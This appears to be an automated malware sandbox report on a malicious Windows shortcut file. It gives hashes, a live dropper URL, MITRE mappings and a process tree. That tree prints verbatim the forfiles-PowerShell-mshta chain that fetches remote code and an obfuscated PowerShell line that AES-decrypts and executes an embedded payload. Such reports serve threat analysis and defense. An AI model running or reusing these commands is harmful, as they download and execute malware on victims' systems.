6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd

General

Target

6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd.lnk
Size

1KB
MD5

90a6eed71981efdcdbc0c8c0151cfb0e
SHA1

c21e13a29ad18e73b88eddec919b85925a95952a
SHA256

6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd
SHA512

fa7b96a7e404dc187d43f04ccd55637a959fbb7950d6b69e80539b4026cfd62460a74330dadb2a8e1578ddf0b87f31a4c8bac6451bd57130aa90f5a5bce77bbd

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://89.23.98.210/qqeng

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
3	2448	mshta.exe
6	2752	powershell.exe
7	2752	powershell.exe
8	2752	powershell.exe
9	2752	powershell.exe

Downloads MZ/PE file

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2792	powershell.exe
2752	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	2752	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2980 wrote to memory of 2552	2980	cmd.exe	29
PID 2980 wrote to memory of 2552	2980	cmd.exe	29
PID 2980 wrote to memory of 2552	2980	cmd.exe	29
PID 2552 wrote to memory of 2792	2552	forfiles.exe	30
PID 2552 wrote to memory of 2792	2552	forfiles.exe	30
PID 2552 wrote to memory of 2792	2552	forfiles.exe	30
PID 2792 wrote to memory of 2448	2792	powershell.exe	31
PID 2792 wrote to memory of 2448	2792	powershell.exe	31
PID 2792 wrote to memory of 2448	2792	powershell.exe	31
PID 2448 wrote to memory of 2752	2448	mshta.exe	32
PID 2448 wrote to memory of 2752	2448	mshta.exe	32
PID 2448 wrote to memory of 2752	2448	mshta.exe	32

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\6086f319caf204ec965aac6797ced062b71bec0f46722100b782fa3bfc31d9bd.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2980
- C:\Windows\System32\forfiles.exe
  "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://89.23.98.210/qqeng
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    start mshta http://89.23.98.210/qqeng
    3⤵
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2792
  - - C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" http://89.23.98.210/qqeng
      4⤵
      Blocklisted process makes network request
      Modifies Internet Explorer settings
      Suspicious use of WriteProcessMemory
      PID:2448
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function vTMsUbI($pvPiSaK){return -split ($pvPiSaK -replace '..', '0x$& ')};$DDZuEbM = vTMsUbI('2EEA8941C1967724856754736159546956BD49A37C0FCCCC019A7902B2F7377223351478D94095CAB7F7575DB48B7888E05DA126156BA4D512049E30C56AB0565023B79613557DF933D7654B2EEFD5218913F64CC80EF58C759DA922A382A9F9A5D83DC2AA6C54F49ABE564470BBA07A95B3416A8E37F7BB5B0FF8C667135BCBDFB64E76FE8C20111234D21AF3B82F2237F9CD00D57356B8C20C45A93686D00D03286206824363AC9ABAE755EB081D827B4A8138B72E5B6B1B696C8CBAE0AB54E1ECB9BCA2DFE6AA14701349B851719FDA148BF227D2CBB1C70AC777C3246A66EB70A75BA2AC17565608748CBC6EDCCFB5B4C9F86D764406F66EFFB2CA141F284F0A7B88E1AE815F89D9252C8E77FD111E7C2F8EB1DC66C76589BAAC727BFB1EDB021E932342EB72DB318BC4A36179C0C5CF70795D0761138A36C1BD37F278A2F571C09575FFC57DEDCF79AE87941DD0BB334EC92CE64D0C8B518903BBAF7155856A83AA9286B06310D255390073E2997DB6E4763BAE864A70DF2B8300547E678644A0B2B4A91BDA0555C692CD3904B199D217D897111CB7F9E20B1C642CB25C7CCE304AAEE359D2595B3D645856E55E04E714B742BB20DD1876139871A9153834A9D96EFE8624F133EA968FF954305F71718E3BAF50BB06EF8F569D25916E4200F6DAA51DD582D0BB183265769AE45B65D59D6DAAD7D24388BC64D566198E072D0684E4A812BED119309279C01830EA4E22E0E986D31CEF7C2A700A8860377F82BC47D36C767CA408D9C9EB6C2F45F66977D04AFE326DDC0349467A342F62699007388135B07AA4A3C9019547CD4F348742E84D2EC52340910278A84BA8A79E9A40AD813D15A4D628EEEBC475733001FDC044E047CAF13540A9C3127CCCA3F27E1FDF7B392CB2AFF6D00F3D36780B548D34602D6FC9714FAA16A624B97A4AAE866B52AA4F3F992E8B73898C34BCCCDB749C0A9602E48CDCC658D9840E9FB0EC44141AADBA92D91C4CC33ECEB4B6A86B4EAB0B25DC950CDA05E4D43AADF3D92985943BA62086C4B8D487537FE589F1F86DFE1E7B7A78E8AF805F5F7C5D7B926FEB19EC212C031070A6E2745D694DD20D2CE59890EBE872C21AB5235BCA04472BE83CDF4B3825BC71CC8A1E9BEA7859DD5A23AE2BD3B6F36DF855487C05821BAFD97441F735A6A921F28249609AC3E67D699D5E691B0FD73FD15B7819E12284442C8F5EAE6BF01E542BAC9F4853D0EEFD36A521FF58A4F23B2612FB6BDA486C8B8B497AA1471320DF6CC59937B1AC74C7D939F4296E35EC04371B6B1401301D99D69CB90D4686D5C63B8B7DC8C11203511BA49E3CD22CD1B2BDF5A8207B116910025C662F5884F0465307EF278D916CDCA3FD86783830357C61D49FA6EF0C097BB53CA6300C557B64244311063A75A15B5621B8B30428F23AE2772668FC4CC6DAC4C28BFC76AA0EA698F79268317615CB97634D83EB1F8FBA3FF8C7EC2205F2B1EE5405B956543AAD2D06D64A95BE72B8E9AC61C785252BE6796AA0F0E709658F47D14139F1F35B520C3F9C5EC5A18A24C3584A73023AA3D65AC32EB0508B26A071FD8AE3D9E3BDD8A213A36B377007FADCAC3201CEB3854AB367857AABB136AFD2969226C750E0B89BF2A1C07B32D69B3094E4107552C4AA703D7F7F2EB800A4B0278DB696236D319D809E1E385510F3D69EDA54A6E1086F8109F4C3DB962DFCC471A47F9081EDB814AD5D135FFA05FA684E4D391AA0D1BA4C37C1271DD00A69F6879455E63626F084172FA8F3D95F6A');$bftik = [System.Security.Cryptography.Aes]::Create();$bftik.Key = vTMsUbI('55676E624475754F69737A6879546E70');$bftik.IV = New-Object byte[] 16;$lJcHtpBA = $bftik.CreateDecryptor();$UZsjRnWNL = $lJcHtpBA.TransformFinalBlock($DDZuEbM, 0, $DDZuEbM.Length);$UVWwHyrcG = [System.Text.Encoding]::Utf8.GetString($UZsjRnWNL);$lJcHtpBA.Dispose();& $UVWwHyrcG.Substring(0,3) $UVWwHyrcG.Substring(3)
        5⤵
        Blocklisted process makes network request
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2877d5092f7f51adfea48540a189ff30

SHA1
5d27075ccc2aab431c8733df6384090898a06a82

SHA256
499fd9bc92a9688afdf07a00fe652e50a5c590ca9e533f0b7f5da9991624fd3f

SHA512
63c93e4aabb39b260aa071eac74ff07f0e1687628eb880734bc5c17f6aa46e3aed6b0b4cc8cd3420093c20e48f65a778ff4f309fc9f4cba8a8a0590417aea56b

Download Submit
memory/2752-55-0x000007FEF4F80000-0x000007FEF591D000-memory.dmp

Filesize
9.6MB

Download
memory/2752-59-0x0000000002C30000-0x0000000002CB0000-memory.dmp

Filesize
512KB

Download
memory/2752-63-0x000007FEF4F80000-0x000007FEF591D000-memory.dmp

Filesize
9.6MB

Download
memory/2752-62-0x0000000002C30000-0x0000000002CB0000-memory.dmp

Filesize
512KB

Download
memory/2752-61-0x0000000002C30000-0x0000000002CB0000-memory.dmp

Filesize
512KB

Download
memory/2752-58-0x000007FEF4F80000-0x000007FEF591D000-memory.dmp

Filesize
9.6MB

Download
memory/2752-54-0x000000001B6B0000-0x000000001B992000-memory.dmp

Filesize
2.9MB

Download
memory/2752-60-0x0000000002C30000-0x0000000002CB0000-memory.dmp

Filesize
512KB

Download
memory/2752-56-0x0000000002C30000-0x0000000002CB0000-memory.dmp

Filesize
512KB

Download
memory/2752-57-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

Filesize
32KB

Download
memory/2792-43-0x0000000002B20000-0x0000000002BA0000-memory.dmp

Filesize
512KB

Download
memory/2792-40-0x000000001B760000-0x000000001BA42000-memory.dmp

Filesize
2.9MB

Download
memory/2792-42-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download
memory/2792-47-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download
memory/2792-46-0x0000000002B20000-0x0000000002BA0000-memory.dmp

Filesize
512KB

Download
memory/2792-44-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download
memory/2792-45-0x0000000002B20000-0x0000000002BA0000-memory.dmp

Filesize
512KB

Download
memory/2792-41-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing